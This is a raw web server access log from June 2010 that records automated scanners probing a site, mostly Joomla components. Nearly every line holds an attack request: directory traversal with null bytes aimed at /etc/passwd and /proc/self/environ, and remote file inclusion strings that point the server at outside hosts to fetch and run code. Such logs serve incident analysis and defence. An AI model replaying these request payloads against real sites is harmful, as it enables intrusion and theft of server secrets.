174.142.68.199 - - [13/Jun/2010:03:11:40 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.68.199 - - [13/Jun/2010:03:11:40 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.68.199 - - [13/Jun/2010:03:11:40 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
194.146.226.69 - - [13/Jun/2010:03:11:51 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
194.146.226.69 - - [13/Jun/2010:03:11:51 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
94.136.63.119 - - [13/Jun/2010:03:12:03 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.136.63.119 - - [13/Jun/2010:03:12:04 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
77.222.56.62 - - [13/Jun/2010:03:12:05 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legy.interfree.it/id.jpg?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
77.222.56.62 - - [13/Jun/2010:03:12:05 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legy.interfree.it/id.jpg?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
64.62.251.26 - - [13/Jun/2010:03:12:10 -0500] "GET /logs/?sourcedir=http://www.ikyoku.co.kr//cgi/inquiry/pid.txt?? HTTP/1.1" 200 9328 "-""libwww-perl/5.79"
64.62.251.26 - - [13/Jun/2010:03:12:11 -0500] "GET /?sourcedir=http://www.ikyoku.co.kr//cgi/inquiry/pid.txt?? HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
64.62.251.26 - - [13/Jun/2010:03:12:13 -0500] "GET /logs/?sourcedir=http://www.ikyoku.co.kr//cgi/inquiry/pid.txt?? HTTP/1.1" 200 9328 "-""libwww-perl/5.79"
64.62.251.26 - - [13/Jun/2010:03:12:13 -0500] "GET /?sourcedir=http://www.ikyoku.co.kr//cgi/inquiry/pid.txt?? HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
64.62.251.26 - - [13/Jun/2010:03:12:26 -0500] "GET /logs/?sourcedir=http://www.ikyoku.co.kr//cgi/inquiry/pid.txt?? HTTP/1.1" 200 9328 "-""libwww-perl/5.79"
64.62.251.26 - - [13/Jun/2010:03:12:26 -0500] "GET /?sourcedir=http://www.ikyoku.co.kr//cgi/inquiry/pid.txt?? HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
194.146.226.69 - - [13/Jun/2010:03:13:24 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.142.68.199 - - [13/Jun/2010:03:14:20 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.68.199 - - [13/Jun/2010:03:14:23 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
66.98.134.54 - - [13/Jun/2010:03:15:38 -0500] "GET /index.php?option=com_powermail&controller=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.98.134.54 - - [13/Jun/2010:03:15:38 -0500] "GET /logs/index.php?option=com_powermail&controller=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.98.134.54 - - [13/Jun/2010:03:15:38 -0500] "GET /logs/access_log.1270771200/index.php?option=com_powermail&controller=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.98.134.54 - - [13/Jun/2010:03:15:47 -0500] "GET /logs/access_log.1271635200/index.php?option=com_powermail&controller=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
189.108.172.26 - - [13/Jun/2010:03:18:12 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:03:18:13 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
194.146.226.69 - - [13/Jun/2010:03:18:19 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
194.146.226.69 - - [13/Jun/2010:03:18:19 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
194.146.226.69 - - [13/Jun/2010:03:18:19 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
209.200.244.57 - - [13/Jun/2010:03:19:24 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.200.244.57 - - [13/Jun/2010:03:19:24 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
189.108.172.26 - - [13/Jun/2010:03:20:39 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:03:20:39 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
200.25.227.25 - - [13/Jun/2010:03:20:53 -0500] "GET /logs/access_log.1274572800%20%20//Gallery/displayCategory.php?basepath=http://neonmp.it/FxID1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
200.25.227.25 - - [13/Jun/2010:03:20:53 -0500] "GET /logs//Gallery/displayCategory.php?basepath=http://neonmp.it/FxID1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
200.25.227.25 - - [13/Jun/2010:03:20:53 -0500] "GET //Gallery/displayCategory.php?basepath=http://neonmp.it/FxID1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
219.240.36.36 - - [13/Jun/2010:03:22:07 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
209.200.244.57 - - [13/Jun/2010:03:23:47 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.142.68.199 - - [13/Jun/2010:03:23:51 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.68.199 - - [13/Jun/2010:03:23:52 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.68.199 - - [13/Jun/2010:03:23:52 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.142.68.199 - - [13/Jun/2010:03:24:24 -0500] "GET /logs/access_log.1274313600/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.68.199 - - [13/Jun/2010:03:24:24 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.68.199 - - [13/Jun/2010:03:24:24 -0500] "GET /logs/index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
189.108.172.26 - - [13/Jun/2010:03:24:48 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:03:24:53 -0500] "GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
109.71.41.45 - - [13/Jun/2010:03:24:57 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
209.200.244.57 - - [13/Jun/2010:03:26:08 -0500] "GET /logs/access_log.1274572800//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.200.244.57 - - [13/Jun/2010:03:26:08 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.200.244.57 - - [13/Jun/2010:03:26:09 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
109.71.41.45 - - [13/Jun/2010:03:26:14 -0500] "GET /logs/access_log.1274572800//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.823"
109.71.41.45 - - [13/Jun/2010:03:26:14 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
109.71.41.45 - - [13/Jun/2010:03:26:14 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
174.37.143.198 - - [13/Jun/2010:03:26:55 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
174.37.143.198 - - [13/Jun/2010:03:26:55 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.37.143.198 - - [13/Jun/2010:03:26:59 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
174.37.143.198 - - [13/Jun/2010:03:27:00 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
209.200.244.57 - - [13/Jun/2010:03:27:08 -0500] "GET /logs/access_log.1274832000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
109.71.41.45 - - [13/Jun/2010:03:27:16 -0500] "GET /logs/access_log.1274832000//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.823"
219.240.36.36 - - [13/Jun/2010:03:28:56 -0500] "GET /logs/access_log.1274832000//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:03:28:57 -0500] "GET //index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:03:29:02 -0500] "GET /logs//index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
67.195.112.180 - - [13/Jun/2010:03:30:01 -0500] "GET /logs/access_log.1215302400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.201 - - [13/Jun/2010:03:32:21 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.142.68.199 - - [13/Jun/2010:03:32:52 -0500] "GET /logs/access_log.1274832000/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.68.199 - - [13/Jun/2010:03:32:58 -0500] "GET /logs/access_log.1274832000/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
212.227.248.216 - - [13/Jun/2010:03:34:02 -0500] "GET /logs/access_log.1274832000/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
212.227.248.216 - - [13/Jun/2010:03:34:07 -0500] "GET /index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
212.227.248.216 - - [13/Jun/2010:03:34:12 -0500] "GET /logs/index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
67.15.152.183 - - [13/Jun/2010:03:35:07 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
67.15.152.183 - - [13/Jun/2010:03:35:07 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
67.15.152.183 - - [13/Jun/2010:03:35:08 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
219.240.36.36 - - [13/Jun/2010:03:35:38 -0500] "GET /index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
67.210.124.10 - - [13/Jun/2010:03:36:10 -0500] "GET /logs//index.php?option=com_appointment&controller=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.210.124.10 - - [13/Jun/2010:03:36:10 -0500] "GET /logs/access_log.1270598400//index.php?option=com_appointment&controller=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.210.124.10 - - [13/Jun/2010:03:36:10 -0500] "GET //index.php?option=com_appointment&controller=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.210.124.10 - - [13/Jun/2010:03:36:10 -0500] "GET /logs/access_log.1271635200//index.php?option=com_appointment&controller=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.210.124.10 - - [13/Jun/2010:03:36:20 -0500] "GET //index.php?option=com_appointment&controller=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.210.124.10 - - [13/Jun/2010:03:36:20 -0500] "GET /logs/access_log.1274832000//index.php?option=com_appointment&controller=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.210.124.10 - - [13/Jun/2010:03:36:20 -0500] "GET /logs//index.php?option=com_appointment&controller=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.210.124.10 - - [13/Jun/2010:03:36:20 -0500] "GET //index.php?option=com_appointment&controller=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.210.124.10 - - [13/Jun/2010:03:36:24 -0500] "GET /logs//index.php?option=com_appointment&controller=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.210.124.10 - - [13/Jun/2010:03:36:24 -0500] "GET /logs/access_log.1271635200//index.php?option=com_appointment&controller=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.210.124.10 - - [13/Jun/2010:03:36:24 -0500] "GET /logs/access_log.1270598400//index.php?option=com_appointment&controller=http://vray-jp.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
187.45.193.159 - - [13/Jun/2010:03:39:14 -0500] "GET /logs/?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 9328 "-""libwww-perl/5.805"
187.45.193.159 - - [13/Jun/2010:03:39:15 -0500] "GET /?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
68.178.194.232 - - [13/Jun/2010:03:40:03 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.811"
174.133.206.82 - - [13/Jun/2010:03:40:48 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
174.133.206.82 - - [13/Jun/2010:03:40:48 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
174.133.206.82 - - [13/Jun/2010:03:40:55 -0500] "GET /logs/access_log.1273622400%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0"
93.159.16.132 - - [13/Jun/2010:03:40:59 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
219.240.36.36 - - [13/Jun/2010:03:41:41 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
174.133.206.82 - - [13/Jun/2010:03:41:57 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
174.133.206.82 - - [13/Jun/2010:03:41:57 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
174.133.206.82 - - [13/Jun/2010:03:41:58 -0500] "GET /logs/access_log.1273622400%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0"
202.72.242.242 - - [13/Jun/2010:03:46:56 -0500] "GET /logs//board//bbs/write_comment_update.php?board_skin_path=http://phamsight.com/docs/images/head??????? HTTP/1.1" 404 325 "-""Mozilla/5.0"
202.72.242.242 - - [13/Jun/2010:03:46:56 -0500] "GET //board//bbs/write_comment_update.php?board_skin_path=http://phamsight.com/docs/images/head??????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.72.242.242 - - [13/Jun/2010:03:46:56 -0500] "GET /logs/access_log.1271548800//board//bbs/write_comment_update.php?board_skin_path=http://phamsight.com/docs/images/head??????? HTTP/1.1" 404 347 "-""Mozilla/5.0"
208.115.111.248 - - [13/Jun/2010:03:47:22 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
188.40.178.145 - - [13/Jun/2010:03:47:40 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
188.40.178.145 - - [13/Jun/2010:03:47:40 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
189.108.172.26 - - [13/Jun/2010:03:47:58 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:03:47:59 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:03:48:00 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
109.71.41.45 - - [13/Jun/2010:03:48:03 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
109.71.41.45 - - [13/Jun/2010:03:48:04 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
189.108.172.26 - - [13/Jun/2010:03:49:00 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:03:49:02 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:03:49:04 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
219.240.36.36 - - [13/Jun/2010:03:49:37 -0500] "GET /logs/access_log.1274832000/index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.65"
